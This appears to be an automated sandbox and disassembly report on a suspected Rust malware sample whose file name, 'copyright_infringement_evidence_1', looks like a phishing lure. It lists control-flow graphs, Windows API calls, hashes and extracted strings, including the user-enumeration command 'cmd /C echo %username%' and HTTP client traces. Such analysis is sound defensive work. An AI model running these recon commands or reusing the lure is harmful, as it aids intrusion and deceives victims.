7ff7a18a11b0 WakeByAddressAll 35083->35086 35099 7ff7a1782ab4 35083->35099 35084 7ff7a1782fc6 35237 7ff7a1788d10 CloseHandle 35084->35237 35087 7ff7a17829a9 35086->35087 35089 7ff7a1789a50 memmove 35087->35089 35087->35099 35088 7ff7a1781fc0 35088->34916 35090 7ff7a17829e6 35089->35090 35091 7ff7a18ad6f0 CloseHandle 35090->35091 35092 7ff7a1782a01 35091->35092 35093 7ff7a1783028 35092->35093 35094 7ff7a1782a2f 35092->35094 35097 7ff7a1783047 35093->35097 35093->35099 35095 7ff7a1781110 3 API calls 35094->35095 35096 7ff7a1782a5c 35095->35096 35101 7ff7a178306b 35096->35101 35103 7ff7a1782a79 35096->35103 35098 7ff7a1781110 3 API calls 35097->35098 35102 7ff7a178305a 35098->35102 35099->34916 35101->35099 35101->35102 35238 7ff7a1788910 CloseHandle 35102->35238 35103->35099 35104 7ff7a1782abe memmove 35103->35104 35105 7ff7a1782aef 35104->35105 35106 7ff7a18a11b0 WakeByAddressAll 35105->35106 35106->35107 35107->35084 35107->35099 35108 7ff7a1781faa 35108->35088 35110 7ff7a18a11d2 35109->35110 35111 7ff7a18a11c5 35109->35111 35144 7ff7a18d75e0 WakeByAddressAll 35110->35144 35111->34947 35145 7ff7a18ad530 35113->35145 35115 7ff7a1789a68 35116 7ff7a18ad530 memmove 35115->35116 35117 7ff7a1789a78 35116->35117 35118 7ff7a18ad530 memmove 35117->35118 35119 7ff7a17829e6 35118->35119 35120 7ff7a18ad6f0 35119->35120 35121 7ff7a18ad708 35120->35121 35122 7ff7a18ad71d 35120->35122 35121->35122 35123 7ff7a18ad70d CloseHandle 35121->35123 35122->34952 35123->35122 35125 7ff7a189ff39 35124->35125 35126 7ff7a18aa3d0 35125->35126 35127 7ff7a18aa3dc CreateDirectoryW 35125->35127 35126->34926 35128 7ff7a18aa408 GetLastError 35127->35128 35129 7ff7a18aa3eb 35127->35129 35128->35126 35128->35129 35129->35126 35131 7ff7a18a5890 memmove 35130->35131 35132 7ff7a1789a22 35131->35132 35132->34928 35137 7ff7a18a58b9 35133->35137 35134 7ff7a18a58eb memmove 35135 7ff7a18a5919 35134->35135 35135->34931 35136 7ff7a18a593a 35136->34931 35137->35134 35137->35136 35139 7ff7a17896d0 35138->35139 35148 7ff7a189ff10 35139->35148 35141 7ff7a17896e0 35141->34933 35142->34946 35143->34946 35144->35111 35146 7ff7a18ad581 memmove 35145->35146 35147 7ff7a18ad5a0 35146->35147 35147->35115 35156 7ff7a18a9e90 35148->35156 35149 7ff7a18aa0d5 35151 7ff7a18aa0da GetLastError CloseHandle 35149->35151 35150 7ff7a18a9fd8 CreateFileW 35152 7ff7a18aa08f GetLastError 35150->35152 35153 7ff7a18aa01b 35150->35153 35154 7ff7a18aa0f9 35151->35154 35155 7ff7a18a9ed0 35152->35155 35153->35155 35157 7ff7a18aa02a GetLastError 35153->35157 35154->35155 35155->35141 35156->35149 35156->35150 35156->35155 35157->35155 35158 7ff7a18aa037 SetFileInformationByHandle 35157->35158 35158->35151 35158->35155 35160 7ff7a178abb0 35159->35160 35163 7ff7a18be752 35161->35163 35162 7ff7a18be781 memmove 35164 7ff7a18be7a5 35162->35164 35163->35162 35163->35164 35164->35013 35166 7ff7a178c6c8 35165->35166 35168 7ff7a178c6b4 35165->35168 35166->35168 35194 7ff7a18cd7c0 35166->35194 35168->35015 35170 7ff7a178871a 35169->35170 35171 7ff7a17885db 35169->35171 35172 7ff7a17821be 35171->35172 35173 7ff7a1788740 BCryptGenRandom SystemFunction036 35171->35173 35174 7ff7a189efa0 35172->35174 35173->35171 35175 7ff7a189efc1 CreateWaitableTimerExW 35174->35175 35176 7ff7a189efb9 35174->35176 35179 7ff7a189f05a 35175->35179 35181 7ff7a189efdc 35175->35181 35176->35175 35176->35179 35177 7ff7a189f09e Sleep 35180 7ff7a17821c8 35177->35180 35178 7ff7a189f051 CloseHandle 35178->35179 35179->35177 35182 7ff7a189f04f 35179->35182 35180->35020 35181->35178 35183 7ff7a189f000 SetWaitableTimer 35181->35183 35182->35177 35182->35179 35183->35178 35184 7ff7a189f02f WaitForSingleObject CloseHandle 35183->35184 35184->35180 35184->35182 35186 7ff7a178c690 2 API calls 35185->35186 35187 7ff7a1781d2a 35186->35187 35188 7ff7a17885c0 2 API calls 35187->35188 35189 7ff7a1781d47 35188->35189 35190 7ff7a189efa0 6 API calls 35189->35190 35191 7ff7a1781d51 35190->35191 35191->35032 35192->35053 35193->35053 35195 7ff7a18cd7d1 35194->35195 35197 7ff7a18cd809 35195->35197 35198 7ff7a178ee60 35195->35198 35197->35168 35199 7ff7a178ee6a 35198->35199 35201 7ff7a178ee75 35198->35201 35202 7ff7a178f110 35199->35202 35201->35197 35203 7ff7a178f123 35202->35203 35206 7ff7a178f17a 35202->35206 35204 7ff7a178f148 BCryptGenRandom 35203->35204 35203->35206 35204->35203 35205 7ff7a178f16c SystemFunction036 35204->35205 35205->35203 35205->35206 35206->35201 35212 7ff7a178bcc6 35207->35212 35208 7ff7a178bf12 35210 7ff7a178bf76 35208->35210 35226 7ff7a18b40c0 35208->35226 35230 7ff7a1788040 35210->35230 35212->35208 35213 7ff7a178be85 35212->35213 35219 7ff7a18b3e30 35213->35219 35216 7ff7a178beb1 35216->35056 35217->35081 35218->35081 35220 7ff7a18b3e66 35219->35220 35221 7ff7a18b3e6f CreateThread 35220->35221 35223 7ff7a18b3f1b 35220->35223 35222 7ff7a18b3f0d 35221->35222 35224 7ff7a18b3ea9 35221->35224 35222->35216 35223->35216 35225 7ff7a18b3ef8 GetLastError 35224->35225 35225->35222 35227 7ff7a18b40db 35226->35227 35228 7ff7a18b4111 GetCurrentThread SetThreadDescription 35227->35228 35229 7ff7a18b4106 35227->35229 35228->35229 35229->35210 35231 7ff7a178804f 35230->35231 35234 7ff7a1781b40 35231->35234 35235 7ff7a18a11b0 WakeByAddressAll 35234->35235 35236 7ff7a1781b59 35235->35236 35237->35108 35238->35108 35604 7ff7a1874100 connect 35605 7ff7a187412a 35604->35605 35606 7ff7a1874118 35604->35606 35609 7ff7a18ab130 GetLastError 35606->35609 35610 7ff7a1874440 35611 7ff7a187456c 35610->35611 35614 7ff7a1874466 35610->35614 35620 7ff7a18d7850 WaitOnAddress GetLastError 35611->35620 35613 7ff7a18744d0 35615 7ff7a18d7910 WakeByAddressSingle 35613->35615 35617 7ff7a1874519 35613->35617 35614->35613 35616 7ff7a1787e90 CloseHandle 35614->35616 35618 7ff7a18744d2 35614->35618 35616->35618 35618->35613 35619 7ff7a1787e90 CloseHandle 35618->35619 35619->35618 35620->35614

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 214 7ff7a1781e23-7ff7a1781e2b 215 7ff7a1781e31-7ff7a1781e56 214->215 216 7ff7a1783370-7ff7a178338b 214->216 217 7ff7a1781e5c-7ff7a1781e78 call 7ff7a18c81e0 215->217 218 7ff7a17833a0-7ff7a17833d7 call 7ff7a18d93c0 215->218 216->218 219 7ff7a178338d-7ff7a178339b call 7ff7a178c650 216->219 224 7ff7a17833dc-7ff7a1783426 217->224 225 7ff7a1781e7e-7ff7a1781f61 call 7ff7a1793300 call 7ff7a1792bb0 call 7ff7a1788ae0 call 7ff7a179c8f0 217->225 218->224 219->218 226 7ff7a1783430-7ff7a1783496 call 7ff7a18d8d40 call 7ff7a18d9120 call 7ff7a18d8f10 call 7ff7a18d93c0 224->226 227 7ff7a178342b call 7ff7a18d93c0 224->227 246 7ff7a1781fa4-7ff7a1781fa7 225->246 247 7ff7a1781fe2-7ff7a17820f3 memmove call 7ff7a18be730 call 7ff7a1781250 225->247 243 7ff7a178349b-7ff7a17834a2 call 7ff7a18d8f10 226->243 227->226 248 7ff7a17834a7-7ff7a17834de call 7ff7a18d93c0 243->248 251 7ff7a1781faa-7ff7a1781fad 246->251 247->246 266 7ff7a17820f9-7ff7a178225f call 7ff7a178c690 call 7ff7a17885c0 call 7ff7a189efa0 call 7ff7a18a5890 call 7ff7a18b5440 call 7ff7a189fea0 247->266 252 7ff7a17834e3-7ff7a17834f5 call 7ff7a18d9120 248->252 254 7ff7a1781fc0-7ff7a1781fe1 251->254 255 7ff7a1781faf-7ff7a1781fb8 251->255 259 7ff7a17834fa-7ff7a1783509 252->259 255->254 258 7ff7a1781fbb call 7ff7a178c650 255->258 258->254 261 7ff7a178352b-7ff7a178354b call 7ff7a18d93c0 259->261 265 7ff7a1783550 261->265 267 7ff7a178355c-7ff7a1783569 call 7ff7a18d8d20 265->267 268 7ff7a1783557 call 7ff7a18d8f10 265->268 266->243 292 7ff7a1782265-7ff7a178242b call 7ff7a17817d0 call 7ff7a18b5440 call 7ff7a18ad410 call 7ff7a189fea0 266->292 273 7ff7a178356e-7ff7a1783579 call 7ff7a18d8d20 267->273 268->267 277 7ff7a178357e-7ff7a178359b call 7ff7a18d8d40 273->277 284 7ff7a178359d-7ff7a17835a8 277->284 285 7ff7a1783606-7ff7a1783610 277->285 288 7ff7a17835ab 284->288 288->288 292->265 302 7ff7a1782431-7ff7a1782916 call 7ff7a1789a50 call 7ff7a18a5a00 CloseHandle * 2 call 7ff7a1781110 call 7ff7a1781d20 call 7ff7a1788c90 292->302 319 7ff7a178291c-7ff7a178297c 302->319 320 7ff7a1782f30-7ff7a1782f73 302->320 319->252 326 7ff7a1782982-7ff7a17829bc call 7ff7a18a11b0 call 7ff7a18a11e0 319->326 322 7ff7a1782f75-7ff7a1782f81 320->322 323 7ff7a1782fd1-7ff7a1782fe9 call 7ff7a1788d10 320->323 325 7ff7a1782f89-7ff7a1782f90 322->325 331 7ff7a1782ffe-7ff7a178300e call 7ff7a17814b0 323->331 332 7ff7a1782feb-7ff7a1782ff9 call 7ff7a178c650 323->332 328 7ff7a1782fc9 325->328 329 7ff7a1782f92-7ff7a1782fb3 call 7ff7a178bbd0 325->329 326->259 342 7ff7a17829c2-7ff7a1782a29 call 7ff7a18ad410 call 7ff7a1789a50 call 7ff7a18ad6f0 call 7ff7a18a5a90 326->342 328->323 329->248 340 7ff7a1782fb9-7ff7a1782fc4 329->340 343 7ff7a1783021-7ff7a1783023 331->343 344 7ff7a1783010-7ff7a178301c call 7ff7a178c650 331->344 332->331 340->325 345 7ff7a1782fc6 340->345 355 7ff7a1783028-7ff7a1783041 call 7ff7a178c640 342->355 356 7ff7a1782a2f-7ff7a1782a73 call 7ff7a1781110 call 7ff7a18c81e0 342->356 343->254 344->343 345->328 355->226 361 7ff7a1783047-7ff7a1783066 call 7ff7a1781110 355->361 366 7ff7a178306b-7ff7a178308c call 7ff7a178c640 356->366 367 7ff7a1782a79-7ff7a1782a8d call 7ff7a1788150 356->367 368 7ff7a17831fd-7ff7a1783215 call 7ff7a1788910 361->368 366->277 374 7ff7a1783092-7ff7a17830b3 366->374 375 7ff7a1782ab9 367->375 376 7ff7a1782a8f 367->376 382 7ff7a1783217-7ff7a178322d call 7ff7a178c650 368->382 383 7ff7a1783232-7ff7a178323d 368->383 378 7ff7a17830c5-7ff7a17830ca 374->378 379 7ff7a17830b5-7ff7a17830c0 call 7ff7a178c650 374->379 381 7ff7a1782abe-7ff7a1782b0c memmove call 7ff7a18a11b0 call 7ff7a18a11e0 375->381 376->273 380 7ff7a1782a95-7ff7a1782ab2 call 7ff7a178c640 376->380 378->368 379->378 380->381 397 7ff7a1782ab4 380->397 413 7ff7a178350b-7ff7a178351a 381->413 414 7ff7a1782b12-7ff7a1782bd8 call 7ff7a18beb60 381->414 382->383 386 7ff7a1783252-7ff7a1783255 383->386 387 7ff7a178323f-7ff7a178324d call 7ff7a178c650 383->387 392 7ff7a1783257-7ff7a178325b 386->392 393 7ff7a1783282-7ff7a178328d 386->393 387->386 398 7ff7a1783269-7ff7a1783270 392->398 395 7ff7a17832a5-7ff7a17832b8 393->395 396 7ff7a178328f-7ff7a17832a0 call 7ff7a178c650 393->396 401 7ff7a17832ba-7ff7a17832be 395->401 402 7ff7a17832e4-7ff7a17832ef 395->402 396->395 397->267 403 7ff7a1783272-7ff7a1783280 call 7ff7a178c650 398->403 404 7ff7a1783260-7ff7a1783267 398->404 406 7ff7a17832c9-7ff7a17832d1 401->406 408 7ff7a1783307-7ff7a1783312 402->408 409 7ff7a17832f1-7ff7a1783302 call 7ff7a178c650 402->409 403->404 404->393 404->398 415 7ff7a17832d3-7ff7a17832e2 call 7ff7a178c650 406->415 416 7ff7a17832c0-7ff7a17832c7 406->416 411 7ff7a1783327-7ff7a1783332 408->411 412 7ff7a1783314-7ff7a1783322 call 7ff7a178c650 408->412 409->408 421 7ff7a1783347-7ff7a1783352 411->421 422 7ff7a1783334-7ff7a1783342 call 7ff7a178c650 411->422 412->411 413->261 414->320 430 7ff7a1782bdb call 7ff7a18aa440 414->430 415->416 416->402 416->406 421->251 426 7ff7a1783358-7ff7a178336b call 7ff7a178c650 421->426 422->421 426->251 430->320
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Failed to read configuration$called `Result::unwrap()` on an `Err` value$cmd/Cecho%username%$failed to spawn thread/rustc/eeb90cda1969383f56a2637cbd3037bdf598841c\library\std\src\thread\mod.rs
                                                                                                          • API String ID: 0-3964578680
                                                                                                          • Opcode ID: bf672478a806531d83ecbff2a346f19282c910a4797e53f2afd6b667ada74947
                                                                                                          • Instruction ID: f01d937e35be48f89c9c0b42e6e9746ac957270e17ba983cfb8d3787e10394be
                                                                                                          • Opcode Fuzzy Hash: bf672478a806531d83ecbff2a346f19282c910a4797e53f2afd6b667ada74947
                                                                                                          • Instruction Fuzzy Hash: 83623D6260EBC184FB70AB15E4403EAE360FB88790F855136DA8D47B6ADF7CD594CB60

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 00007FF7A18B6EFA
                                                                                                          • assertion failed: len >= mem::size_of::<c::sockaddr_in>()library\std\src\sys_common\net.rs, xrefs: 00007FF7A18B6EE2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$bindclosesocketgetsockname
                                                                                                          • String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()library\std\src\sys_common\net.rs
                                                                                                          • API String ID: 3597230135-513854611
                                                                                                          • Opcode ID: 372025bdf9b2e01a1c9daa68d98df84d9b114bbc7afad01473dc20deb796e1a4
                                                                                                          • Instruction ID: 7a96feb0e7dbdbcc10317b2fd8be3a240ff9d5da7a821710c690f360e366e600
                                                                                                          • Opcode Fuzzy Hash: 372025bdf9b2e01a1c9daa68d98df84d9b114bbc7afad01473dc20deb796e1a4
                                                                                                          • Instruction Fuzzy Hash: 4E51E421E0A6918AF324AF64E0012FDB370EF44368FA18174EE4D47BA0FB7CA595CB10

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 738 7ff7a178abff-7ff7a178ace9 call 7ff7a18797d0 call 7ff7a1879690 call 7ff7a1865c20 call 7ff7a1865c50 call 7ff7a189eeb0 call 7ff7a178c640 751 7ff7a178acef-7ff7a178ad8e memmove 738->751 752 7ff7a178bb8c-7ff7a178bba2 call 7ff7a18d8d40 call 7ff7a18d9770 738->752 756 7ff7a178ad90-7ff7a178ad93 751->756 760 7ff7a178bba7-7ff7a178bbb1 call 7ff7a18d8d40 752->760 758 7ff7a178bb49-7ff7a178bb50 call 7ff7a18d9770 756->758 759 7ff7a178ad99-7ff7a178ada3 756->759 765 7ff7a178bb55-7ff7a178bb5c call 7ff7a18d9770 758->765 761 7ff7a178ada5-7ff7a178ada8 759->761 762 7ff7a178ae09-7ff7a178af1c memmove * 2 call 7ff7a178a860 call 7ff7a1790d40 759->762 768 7ff7a178bbb6-7ff7a178bbc7 call 7ff7a18d8d40 760->768 761->765 766 7ff7a178adae-7ff7a178adc1 761->766 779 7ff7a178af30-7ff7a178af51 762->779 780 7ff7a178af1e-7ff7a178af20 762->780 772 7ff7a178bb61-7ff7a178bb74 call 7ff7a18d8d20 765->772 766->762 777 7ff7a178bb79-7ff7a178bb87 call 7ff7a18d8d20 772->777 777->752 783 7ff7a178b7c7-7ff7a178b7de 779->783 784 7ff7a178af57-7ff7a178af5a 779->784 782 7ff7a178b352-7ff7a178b36f 780->782 787 7ff7a178b480-7ff7a178b4b3 call 7ff7a1865c20 782->787 788 7ff7a178b375-7ff7a178b383 782->788 789 7ff7a178b894-7ff7a178b8ba call 7ff7a178a990 783->789 785 7ff7a178af60-7ff7a178afaf call 7ff7a1790d40 784->785 786 7ff7a178b7e3-7ff7a178b7e6 784->786 810 7ff7a178afc0-7ff7a178afe1 785->810 811 7ff7a178afb1-7ff7a178afb3 785->811 786->789 802 7ff7a178b6b3-7ff7a178b6b7 787->802 803 7ff7a178b4b9-7ff7a178b4c0 787->803 793 7ff7a178b462-7ff7a178b471 call 7ff7a189f0b0 788->793 794 7ff7a178b389-7ff7a178b453 call 7ff7a189eeb0 call 7ff7a18797d0 call 7ff7a1879690 788->794 804 7ff7a178b8cb-7ff7a178b8fb call 7ff7a178c650 call 7ff7a178aa60 789->804 805 7ff7a178b8bc-7ff7a178b8c6 call 7ff7a178c650 789->805 793->756 807 7ff7a178b477 793->807 794->793 851 7ff7a178b455-7ff7a178b45d call 7ff7a1787c70 794->851 808 7ff7a178b740-7ff7a178b768 802->808 809 7ff7a178b6bd-7ff7a178b73b call 7ff7a18797d0 call 7ff7a1879690 802->809 812 7ff7a178b4c6-7ff7a178b5c8 call 7ff7a189eeb0 call 7ff7a1865c60 call 7ff7a18797d0 call 7ff7a1879690 803->812 813 7ff7a178b5d7-7ff7a178b601 call 7ff7a1865c60 call 7ff7a189f250 803->813 852 7ff7a178b901-7ff7a178b946 call 7ff7a17836b0 804->852 853 7ff7a178b9cb 804->853 805->804 807->787 824 7ff7a178bb17-7ff7a178bb1a call 7ff7a178aa60 808->824 825 7ff7a178b76e-7ff7a178b770 808->825 809->808 820 7ff7a178bad3-7ff7a178bb0c call 7ff7a1896210 810->820 821 7ff7a178afe7-7ff7a178afea 810->821 811->782 812->813 884 7ff7a178b5ca-7ff7a178b5d2 call 7ff7a1787c70 812->884 813->756 855 7ff7a178b607 813->855 838 7ff7a178b871-7ff7a178b889 820->838 846 7ff7a178bb12 820->846 830 7ff7a178aff0-7ff7a178b059 call 7ff7a1792b60 821->830 831 7ff7a178b864-7ff7a178b86f 821->831 834 7ff7a178bb1f-7ff7a178bb48 824->834 825->834 835 7ff7a178b776-7ff7a178b79e call 7ff7a178a860 call 7ff7a178a990 825->835 858 7ff7a178b05b 830->858 859 7ff7a178b08e 830->859 831->789 831->838 870 7ff7a178b7af-7ff7a178b7c2 call 7ff7a178c650 835->870 871 7ff7a178b7a0-7ff7a178b7aa call 7ff7a178c650 835->871 838->789 846->789 851->793 868 7ff7a178b9ea-7ff7a178ba5f 852->868 869 7ff7a178b94c-7ff7a178b965 call 7ff7a178c640 852->869 856 7ff7a178b9d3-7ff7a178b9e5 853->856 873 7ff7a178b60c-7ff7a178b639 call 7ff7a18cd720 855->873 856->834 858->777 866 7ff7a178b061-7ff7a178b07e call 7ff7a178c640 858->866 864 7ff7a178b093-7ff7a178b0e0 859->864 872 7ff7a178b0e6-7ff7a178b0ee 864->872 864->873 866->772 885 7ff7a178b084-7ff7a178b08c 866->885 891 7ff7a178ba66-7ff7a178bad1 868->891 869->760 893 7ff7a178b96b-7ff7a178b98a call 7ff7a178c640 869->893 870->834 871->870 880 7ff7a178b0f0-7ff7a178b0f9 872->880 881 7ff7a178b139-7ff7a178b181 872->881 888 7ff7a178b63f-7ff7a178b65a call 7ff7a18cd720 873->888 889 7ff7a178b0ff-7ff7a178b131 memmove 873->889 880->888 880->889 897 7ff7a178b65f-7ff7a178b68d call 7ff7a18cd720 881->897 898 7ff7a178b187-7ff7a178b18f 881->898 884->813 885->864 888->889 889->881 891->834 893->768 905 7ff7a178b990-7ff7a178b9c9 893->905 906 7ff7a178b693-7ff7a178b6ae call 7ff7a18cd720 897->906 907 7ff7a178b19a-7ff7a178b1c7 memmove 897->907 902 7ff7a178b191-7ff7a178b194 898->902 903 7ff7a178b1cc-7ff7a178b1f7 898->903 902->906 902->907 910 7ff7a178b1ff-7ff7a178b216 call 7ff7a1790d40 903->910 905->856 906->907 907->903 915 7ff7a178b350 910->915 916 7ff7a178b21c-7ff7a178b23d 910->916 915->782 917 7ff7a178b243-7ff7a178b246 916->917 918 7ff7a178b7eb-7ff7a178b833 call 7ff7a18963a0 916->918 919 7ff7a178b835-7ff7a178b840 917->919 920 7ff7a178b24c-7ff7a178b281 917->920 918->789 919->831 925 7ff7a178b842-7ff7a178b860 call 7ff7a178c650 919->925 922 7ff7a178b2ff-7ff7a178b328 call 7ff7a18cd720 920->922 923 7ff7a178b283-7ff7a178b286 920->923 930 7ff7a178b291-7ff7a178b2be memmove 922->930 931 7ff7a178b32e-7ff7a178b349 call 7ff7a18cd720 922->931 926 7ff7a178b2c3-7ff7a178b2fa 923->926 927 7ff7a178b288-7ff7a178b28b 923->927 925->838 936 7ff7a178b862 925->936 926->910 927->930 927->931 930->926 931->930 936->789
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID: reqwest::blocking::wait() park timeout
                                                                                                          • API String ID: 2162964266-2803002432
                                                                                                          • Opcode ID: a4ab1c7cd42c6752e6639e0f9c9e48a7c624a6d7e45c5c81a615afa238f8f78f
                                                                                                          • Instruction ID: 5c79b2da52837e24e6ed022407f6dd6166b5e7f34fea8a4f6595cbcf3b992a21
                                                                                                          • Opcode Fuzzy Hash: a4ab1c7cd42c6752e6639e0f9c9e48a7c624a6d7e45c5c81a615afa238f8f78f
                                                                                                          • Instruction Fuzzy Hash: 8B825D62A0EBC580F7719B15E5403EAE360FB99795F815125DB8C03BAADFBCE194CB10
                                                                                                          Strings
                                                                                                          • assertion failed: buf.len() <= u32::MAX as usize/rustc/eeb90cda1969383f56a2637cbd3037bdf598841c\library\std\src\sys\pal\windows\io.rs, xrefs: 00007FF7A17A9E32
                                                                                                          • assertion failed: buf.len() <= u32::MAX as usize/rustc/eeb90cda1969383f56a2637cbd3037bdf598841c\library\std\src\sys\pal\windows\io.rs, xrefs: 00007FF7A17A9E0B
                                                                                                          • Out of bounds access, xrefs: 00007FF7A17A9E4A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Out of bounds access$assertion failed: buf.len() <= u32::MAX as usize/rustc/eeb90cda1969383f56a2637cbd3037bdf598841c\library\std\src\sys\pal\windows\io.rs$assertion failed: buf.len() <= u32::MAX as usize/rustc/eeb90cda1969383f56a2637cbd3037bdf598841c\library\std\src\sys\pal\windows\io.rs
                                                                                                          • API String ID: 0-397905853
                                                                                                          • Opcode ID: 8854f33919a584b7139ae7e2592f7493eee5399212fc71b11abcd5c2a85043e2
                                                                                                          • Instruction ID: 36ec7859708d767b6f36557fcccc61ff9832d9cff9460fb31aad0a209ba52b3a
                                                                                                          • Opcode Fuzzy Hash: 8854f33919a584b7139ae7e2592f7493eee5399212fc71b11abcd5c2a85043e2
                                                                                                          • Instruction Fuzzy Hash: 6D12B475A0AB8181FB60DB15E4403EAB3A1FB88784F919036CA8D577A9DFBCD065CB50
                                                                                                          APIs
                                                                                                          • BCryptGenRandom.BCRYPT(?,?,?,00007FF7A178EE75,?,?,?,00007FF7A18CD809), ref: 00007FF7A178F162
                                                                                                          • SystemFunction036.ADVAPI32(?,?,?,00007FF7A178EE75,?,?,?,00007FF7A18CD809), ref: 00007FF7A178F173
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CryptFunction036RandomSystem
                                                                                                          • String ID:
                                                                                                          • API String ID: 1232939966-0
                                                                                                          • Opcode ID: 6fa294837635f7774923321bb53f3b1fabd19b28cc9b25b5f9b5b1444506c0bc
                                                                                                          • Instruction ID: c0938d81502f900299822bcd8f7ea747dd9fc6ede342786fda2cfc7c760d4b42
                                                                                                          • Opcode Fuzzy Hash: 6fa294837635f7774923321bb53f3b1fabd19b28cc9b25b5f9b5b1444506c0bc
                                                                                                          • Instruction Fuzzy Hash: CAF0F412F1B15550FBA17A676E04530D1822F6EBF1D794371AC3C8BFF1EC6898865A20
                                                                                                          APIs
                                                                                                          Memory Dump Source
